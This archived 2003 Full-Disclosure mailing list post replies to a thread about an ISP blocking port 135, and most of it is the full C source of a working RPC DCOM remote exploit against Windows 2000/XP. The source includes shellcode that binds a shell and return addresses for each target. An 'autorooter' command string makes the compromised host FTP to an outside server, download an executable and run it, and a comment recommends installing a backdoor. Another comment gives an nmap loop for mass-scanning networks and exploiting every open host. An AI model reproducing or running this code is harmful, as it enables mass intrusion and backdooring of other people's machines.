lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <001701c35f99$106b2c40$9f0cce0c@cocaroac7d1dhl>
From: volkam at comcast.net (Anthony Clark)
Subject: Cox is blocking port 135 - off topic

Right..

/* Windows 2003 <= remote RPC DCOM exploit
 * Coded by .:[oc192.us]:. Security
 * Modified by rogers@...et
 *
 * Features:
 *
 * -d destination host to attack.
 *
 * -p for port selection as exploit works on ports other than
135(139,445,539 etc)
 *
 * -r for using a custom return address.
 *
 * -t to select target type (Offset) , this includes universal offsets for -
 *    win2k and winXP (Regardless of service pack)
 *
 * -l to select bindshell port on remote machine (Default: 666)
 *
 * - Shellcode has been modified to call ExitThread, rather than
ExitProcess, thus
 *   preventing crash of RPC service on remote machine.
 *
 * Modification:
 *
 *  AUTOROOTER
 *
 *  Modify the commands in *cmd, in void con(int sockfd){} 3rd line
 *  I suggest having it ftp to a box and download a backdoor, run it, then
exit.
 *
 * Works well with this class C (B /16 or A /8 as well) command line scanner
using nmap:
 *
 * /usr/bin/nmap -sS -p 135 -oG out $1/24
 * for i in `cat out | grep open | awk '{print $2}'`; do
 * ./rogers-oc192-dcom -d $i -t 1&
 * ./rogers-oc192-dcom -d $i -t 0&
 * done
 *
 *
 * sh scan.sh 10.10.2.0
 *
 * Happy owning!
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>

/* xfocus start */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0
x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0
x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0
x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,
0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,
0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,
0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,
0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,
0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,
0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,
0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,
0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,
0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,
0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,
0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,
0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,
0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,
0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,
0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,
0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,
0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,
0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,
0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,
0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,
0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,
0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,
0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,
0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,
0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,
0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,
0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,
0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,
0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,
0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,
0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,
0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,
0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
/* end xfocus */

int type=0;
struct
{
  char *os;
  u_long ret;
}
 targets[] =
 {
  { "[Win2k-Universal]", 0x0018759F },
  { "[WinXP-Universal]", 0x0100139d },
}, v;


void usage(char *prog)
{
  int i;
  printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
  printf("\nModified by rogers@...et bling bling\n\n");
  printf("Usage:\n\n");
  printf("%s -d <host> [options]\n", prog);
  printf("Options:\n");
  printf("      -d:             Hostname to attack [Required]\n");
  printf("      -t:             Type [Default: 0]\n");
  printf("      -r:             Return address [Default: Selected from
target]\n");
  printf("      -p:             Attack port [Default: 135]\n");
  printf("      -l:             Bindshell port [Default: 666]\n\n");
  printf("Types:\n");
  for(i = 0; i < sizeof(targets)/sizeof(v); i++)
    printf("    %d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
  exit(0);
}

unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */

    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* bindshell no RPC crash, defineable spawn port */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

/* xfocus start */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,
0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,
0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/* end xfocus */

/* Not ripped from teso =) */
void con(int sockfd)
{

/* Modify the cmdline here, make sure leave exit\n or else it wont work :D
*/

  char rb[1500], *cmd="echo open ip>>o&echo test>>o&echo test>>o&echo user
test test>>o&echo bin>>o&echo get dllreg.exe>>o&echo
bye>>o&ftp -s:o&dllreg.exe&del o&echo test&exit\n";
  fd_set  fdreadme;
  int i;

  FD_ZERO(&fdreadme);
  FD_SET(sockfd, &fdreadme);
  FD_SET(0, &fdreadme);

/*  Write our commands to the shell   */

        send(sockfd, cmd, strlen(cmd), 0);

  while(1)
  {
    FD_SET(sockfd, &fdreadme);
    FD_SET(0, &fdreadme);
      if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
        if(FD_ISSET(sockfd, &fdreadme))
        {
          if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
          {
            printf("[-] Connection lost..\n");
            exit(1);
          }
            if(write(1, rb, i) < 0) break;
        }

        if(FD_ISSET(0, &fdreadme))
        {
          if((i = read(0, rb, sizeof(rb))) < 0)
          {
            printf("[-] Connection lost..\n");
            exit(1);
          }
           if (send(sockfd, rb, i, 0) < 0) break;
        }

/*   exit after a pause  */

           usleep(10000);
           exit(0);
        }

        printf("[-] Connection closed by foreign host..\n");

        exit(0);
}

int main(int argc, char **argv)
{
    int len, len1, sockfd, c, a;
    unsigned long ret;
    unsigned short port = 135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short lportl=666; /* drg */
    char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
    struct hostent *he;
    struct sockaddr_in their_addr;
    static char *hostname=NULL;

    if(argc<2)
    {
      usage(argv[0]);
    }

    while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
    {
      switch (c)
      {
        case 'd':
          hostname = optarg;
          break;
        case 't':
          type = atoi(optarg);
          if((type > 1) || (type < 0))
          {
            printf("[-] Select a valid target:\n");
              for(a = 0; a < sizeof(targets)/sizeof(v); a++)
              printf("    %d [0x%.8x]: %s\n", a, targets[a].ret,
targets[a].os);
              return 1;
          }
          break;
        case 'r':
          targets[type].ret = strtoul(optarg, NULL, 16);
          break;
        case 'p':
          port = atoi(optarg);
          if((port > 65535) || (port < 1))
          {
            printf("[-] Select a port between 1-65535\n");
            return 1;
          }
          break;
        case 'l':
          lportl = atoi(optarg);
          if((port > 65535) || (port < 1))
          {
            printf("[-] Select a port between 1-65535\n");
            return 1;
          }
          break;
       default:
          usage(argv[0]);
          return 1;
      }
    }

    if(hostname==NULL)
    {
      printf("[-] Please enter a hostname with -d\n");
      exit(1);
    }

    printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
    printf("[+] Resolving host..\n");

    if((he = gethostbyname(hostname)) == NULL)
    {
      printf("[-] gethostbyname: Couldnt resolve hostname\n");
      exit(1);
    }

    printf("[+] Done.\n");

    printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n",
              targets[type].os, hostname, port, lportl, targets[type].ret);

    /* drg */
    lportl=htons(lportl);
    memcpy(&lport[1], &lportl, 2);
    *(long*)lport = *(long*)lport ^ 0x9432BF80;
    memcpy(&sc[471],&lport,4);

    memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);

    their_addr.sin_family = AF_INET;
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    their_addr.sin_port = htons(port);

    if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("[-] Socket failed");
        return(0);
    }

    if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct
sockaddr)) == -1)
    {
        perror("[-] Connect failed");
        return(0);
    }

    /* xfocus start */
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);

    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
    *(unsigned long *)(request2+8)=*(unsigned long
*)(request2+8)+sizeof(sc)/2;

    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);

    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;


    *(unsigned long *)(buf2+0x10)=*(unsigned long
*)(buf2+0x10)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x80)=*(unsigned long
*)(buf2+0x80)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long
*)(buf2+0x84)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long
*)(buf2+0xb4)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long
*)(buf2+0xb8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long
*)(buf2+0xd0)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long
*)(buf2+0x18c)+sizeof(sc)-0xc;
    /* end xfocus */


    if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
    {
            perror("[-] Send failed");
            return(0);
    }
    len=recv(sockfd, buf1, 1000, 0);

    if (send(sockfd,buf2,len1,0)== -1)
    {
            perror("[-] Send failed");
            return(0);
    }
    close(sockfd);
    sleep(1);

    their_addr.sin_family = AF_INET;
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    their_addr.sin_port = lportl;

    if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("[-] Socket failed");
        return(0);
    }

    if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct
sockaddr)) == -1)
    {
        printf("[-] Couldnt connect to bindshell, possible reasons:\n");
        printf("        1:      Host is firewalled\n");
        printf("        2:      Exploit failed\n");
        return(0);
    }

    printf("[+] Connected to bindshell..\n\n");

    sleep(1);

    con(sockfd);

    return(0);
}
----- Original Message ----- 
From: "Joey" <joey2cool@...oo.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Sunday, August 10, 2003 3:21 PM
Subject: Re: [Full-Disclosure] Cox is blocking port 135 - off topic


> cox does block port 445 also, but i havent seen any
> exploits that use that port. even though its said that
> port 445 is vulnerable, where is the POC?
>
> --- Kurt Seifried <listuser@...fried.org> wrote:
> > Off topic:
> >
> > This won't help much at all. Windows 2000/XP run
> > Microsoft SMB over TCP on
> > 445 as well (reduced overhead then 135/etc, no
> > NetBIOS layer). When a client
> > tries to connect to a remote host for file/print
> > sharing/etc it connects on
> > both ports 135 and 445, if a response is recieved
> > from port 445 it drops the
> > connection to 135. THe attack works quite well
> > against client systems using
> > port 445. If Cox blocks both ports 135 and 445 that
> > will be semi-effective
> > (except of course for internal users who spread a
> > worm/etc, such as laptops
> > that move around). THis may block a few of the more
> > stupid attacks but not
> > for long.
> >
> > Kurt Seifried, kurt@...fried.org
> > A15B BEE5 B391 B9AD B0EF
> > AEB0 AD63 0B4E AD56 E574
> > http://seifried.org/security/
> >
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! SiteBuilder - Free, easy-to-use web site design software
> http://sitebuilder.yahoo.com
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ